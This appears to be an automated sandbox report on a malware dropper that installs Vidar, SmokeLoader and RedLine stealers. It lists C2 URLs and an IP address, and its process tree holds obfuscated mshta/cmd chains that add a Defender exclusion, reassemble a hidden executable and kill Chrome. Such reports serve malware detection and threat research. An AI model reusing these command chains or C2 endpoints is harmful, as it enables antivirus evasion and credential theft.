Resubmissions

08-10-2021 15:07

211008-shl8xsefa9 10

08-10-2021 05:38

211008-gbvqyadce8 10

07-10-2021 18:28

211007-w4jayacge3 10

Analysis

  • max time kernel
    17s
  • max time network
    76s
  • platform
    windows10_x64
  • resource
    win10-de-20210920
  • submitted
    07-10-2021 18:28

General

  • Target

    setup_x86_x64_install.exe

  • Size

    5.9MB

  • MD5

    0308d3044eda0db671c58c2a97cb3c10

  • SHA1

    1737ab616a61d35b0bde0aaad949d9894e14be9e

  • SHA256

    b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072

  • SHA512

    29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e

Malware Config

Extracted

Family

vidar

Version

41.2

Botnet

916

C2

https://mas.to/@serg4325

Attributes
  • profile_id

    916

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

media214

C2

91.121.67.60:2151

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 14 IoCs
  • Loads dropped DLL 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:768
      • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1584
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1588
          • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu166f9a8bbe80.exe
            Thu166f9a8bbe80.exe
            5⤵
            • Executes dropped EXE
            PID:396
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
            PID:812
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              5⤵
                PID:436
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1236
              • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16205451b994.exe
                Thu16205451b994.exe /mixone
                5⤵
                • Executes dropped EXE
                PID:2044
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 656
                  6⤵
                  • Program crash
                  PID:4660
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 672
                  6⤵
                  • Program crash
                  PID:5016
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 728
                  6⤵
                  • Program crash
                  PID:4124
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Thu161580bf75.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3000
              • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu161580bf75.exe
                Thu161580bf75.exe
                5⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1956
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1064
              • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu1628aafb3efd7c3d.exe
                Thu1628aafb3efd7c3d.exe
                5⤵
                • Executes dropped EXE
                PID:2008
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3444
              • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16466b26f8b7.exe
                Thu16466b26f8b7.exe
                5⤵
                • Executes dropped EXE
                PID:1728
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe
              4⤵
                PID:760
                • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16f584bd3686.exe
                  Thu16f584bd3686.exe
                  5⤵
                  • Executes dropped EXE
                  PID:1004
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe
                4⤵
                  PID:4080
                  • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16f3de88a335950bb.exe
                    Thu16f3de88a335950bb.exe
                    5⤵
                    • Executes dropped EXE
                    PID:2252
                    • C:\Users\Admin\AppData\Local\Temp\is-E8N51.tmp\Thu16f3de88a335950bb.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-E8N51.tmp\Thu16f3de88a335950bb.tmp" /SL5="$3012A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16f3de88a335950bb.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:3660
                      • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16f3de88a335950bb.exe
                        "C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16f3de88a335950bb.exe" /SILENT
                        7⤵
                          PID:4068
                          • C:\Users\Admin\AppData\Local\Temp\is-HS0MF.tmp\Thu16f3de88a335950bb.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-HS0MF.tmp\Thu16f3de88a335950bb.tmp" /SL5="$501F4,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu16f3de88a335950bb.exe" /SILENT
                            8⤵
                              PID:1096
                              • C:\Users\Admin\AppData\Local\Temp\is-4TBBG.tmp\postback.exe
                                "C:\Users\Admin\AppData\Local\Temp\is-4TBBG.tmp\postback.exe" ss1
                                9⤵
                                  PID:4276
                                • C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
                                  "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
                                  9⤵
                                    PID:4332
                                  • C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
                                    "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
                                    9⤵
                                      PID:4348
                                      • C:\033c60786a0c489c6d9db8ef\Setup.exe
                                        C:\033c60786a0c489c6d9db8ef\\Setup.exe /q /norestart /x86 /x64 /web
                                        10⤵
                                          PID:4616
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Thu164ba03be19.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1340
                              • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exe
                                Thu164ba03be19.exe
                                5⤵
                                • Executes dropped EXE
                                PID:2028
                                • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exe
                                  C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exe
                                  6⤵
                                    PID:1636
                                  • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exe
                                    C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exe
                                    6⤵
                                      PID:2640
                                    • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exe
                                      C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu164ba03be19.exe
                                      6⤵
                                        PID:4688
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe
                                    4⤵
                                      PID:1484
                                      • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu1653d94a8da.exe
                                        Thu1653d94a8da.exe
                                        5⤵
                                        • Executes dropped EXE
                                        PID:3200
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu1653d94a8da.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                          6⤵
                                            PID:3204
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu1653d94a8da.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu1653d94a8da.exe" ) do taskkill /F -Im "%~NxU"
                                              7⤵
                                                PID:2232
                                                • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                  09xU.EXE -pPtzyIkqLZoCarb5ew
                                                  8⤵
                                                    PID:3256
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                      9⤵
                                                        PID:2248
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                          10⤵
                                                            PID:4124
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                          9⤵
                                                            PID:4608
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                              10⤵
                                                                PID:4756
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                  11⤵
                                                                    PID:4804
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                    11⤵
                                                                      PID:4820
                                                                    • C:\Windows\SysWOW64\control.exe
                                                                      control .\R6f7sE.I
                                                                      11⤵
                                                                        PID:4844
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                          12⤵
                                                                            PID:4900
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /F -Im "Thu1653d94a8da.exe"
                                                                    8⤵
                                                                    • Kills process with taskkill
                                                                    PID:4048
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe
                                                            4⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1460
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu167d514d2a7ac5a.exe
                                                              Thu167d514d2a7ac5a.exe
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:2824
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe
                                                            4⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1208
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS003E69F5\Thu165bd34b1e1d4d81.exe
                                                              Thu165bd34b1e1d4d81.exe
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1492
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                6⤵
                                                                  PID:4228
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im chrome.exe
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:4320

                                                      Network

                                                      MITRE ATT&CK Enterprise v6

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • memory/396-249-0x0000000005940000-0x0000000005A83000-memory.dmp

                                                        Filesize

                                                        1.3MB

                                                      • memory/436-199-0x00000000002D0000-0x00000000002D1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-243-0x0000000007840000-0x0000000007841000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-308-0x000000007F010000-0x000000007F011000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-305-0x0000000008DA0000-0x0000000008DD3000-memory.dmp

                                                        Filesize

                                                        204KB

                                                      • memory/436-261-0x00000000002D0000-0x00000000002D1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-248-0x0000000007F70000-0x0000000007F71000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-241-0x0000000007930000-0x0000000007931000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-236-0x0000000006B40000-0x0000000006B41000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-235-0x00000000074D0000-0x00000000074D1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-234-0x0000000007460000-0x0000000007461000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-233-0x00000000072E0000-0x00000000072E1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-232-0x0000000007430000-0x0000000007431000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-228-0x0000000007370000-0x0000000007371000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-215-0x00000000003D2000-0x00000000003D3000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-213-0x00000000003D0000-0x00000000003D1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-211-0x0000000006BB0000-0x0000000006BB1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-203-0x00000000002D0000-0x00000000002D1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/436-209-0x0000000000C40000-0x0000000000C41000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/1096-238-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/1584-132-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                        Filesize

                                                        572KB

                                                      • memory/1584-135-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                      • memory/1584-141-0x0000000064940000-0x0000000064959000-memory.dmp

                                                        Filesize

                                                        100KB

                                                      • memory/1584-143-0x0000000064940000-0x0000000064959000-memory.dmp

                                                        Filesize

                                                        100KB

                                                      • memory/1584-138-0x0000000064940000-0x0000000064959000-memory.dmp

                                                        Filesize

                                                        100KB

                                                      • memory/1584-142-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                        Filesize

                                                        152KB

                                                      • memory/1584-136-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                      • memory/1584-137-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                      • memory/1584-139-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                      • memory/1584-140-0x0000000064940000-0x0000000064959000-memory.dmp

                                                        Filesize

                                                        100KB

                                                      • memory/1584-134-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                        Filesize

                                                        572KB

                                                      • memory/1584-133-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                        Filesize

                                                        572KB

                                                      • memory/1728-225-0x0000000000400000-0x0000000002D9C000-memory.dmp

                                                        Filesize

                                                        41.6MB

                                                      • memory/1728-221-0x0000000002E00000-0x0000000002EAE000-memory.dmp

                                                        Filesize

                                                        696KB

                                                      • memory/1956-242-0x0000000002D30000-0x0000000002D31000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/1956-204-0x000000001BA30000-0x000000001BA32000-memory.dmp

                                                        Filesize

                                                        8KB

                                                      • memory/1956-177-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/1956-190-0x00000000014F0000-0x00000000014F1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/2008-227-0x0000000004BA0000-0x0000000004C76000-memory.dmp

                                                        Filesize

                                                        856KB

                                                      • memory/2008-240-0x0000000000400000-0x0000000002E08000-memory.dmp

                                                        Filesize

                                                        42.0MB

                                                      • memory/2028-230-0x00000000050D0000-0x00000000050D1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/2028-220-0x0000000002540000-0x0000000002541000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/2028-216-0x0000000002550000-0x0000000002551000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/2028-212-0x0000000004B20000-0x0000000004B21000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/2028-202-0x0000000000270000-0x0000000000271000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/2044-223-0x0000000002DC0000-0x0000000002F0A000-memory.dmp

                                                        Filesize

                                                        1.3MB

                                                      • memory/2044-191-0x0000000003058000-0x0000000003081000-memory.dmp

                                                        Filesize

                                                        164KB

                                                      • memory/2044-239-0x0000000000400000-0x0000000002DBC000-memory.dmp

                                                        Filesize

                                                        41.7MB

                                                      • memory/2124-273-0x0000000001250000-0x0000000001265000-memory.dmp

                                                        Filesize

                                                        84KB

                                                      • memory/2252-200-0x0000000000400000-0x0000000000414000-memory.dmp

                                                        Filesize

                                                        80KB

                                                      • memory/3200-196-0x0000000000120000-0x0000000000121000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/3200-198-0x0000000000120000-0x0000000000121000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/3256-250-0x00000000005E0000-0x00000000005E1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/3256-251-0x00000000005E0000-0x00000000005E1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/3660-214-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/4068-229-0x0000000000400000-0x0000000000414000-memory.dmp

                                                        Filesize

                                                        80KB

                                                      • memory/4332-311-0x0000000005063000-0x0000000005065000-memory.dmp

                                                        Filesize

                                                        8KB

                                                      • memory/4332-282-0x0000000005060000-0x0000000005061000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/4332-270-0x0000000000650000-0x0000000000651000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/4688-298-0x0000000004D60000-0x0000000004D61000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/4688-290-0x0000000000400000-0x0000000000422000-memory.dmp

                                                        Filesize

                                                        136KB

                                                      • memory/4688-295-0x0000000005350000-0x0000000005351000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/4688-300-0x0000000004E90000-0x0000000004E91000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/4688-303-0x0000000004DC0000-0x0000000004DC1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/4688-306-0x0000000004D40000-0x0000000005346000-memory.dmp

                                                        Filesize

                                                        6.0MB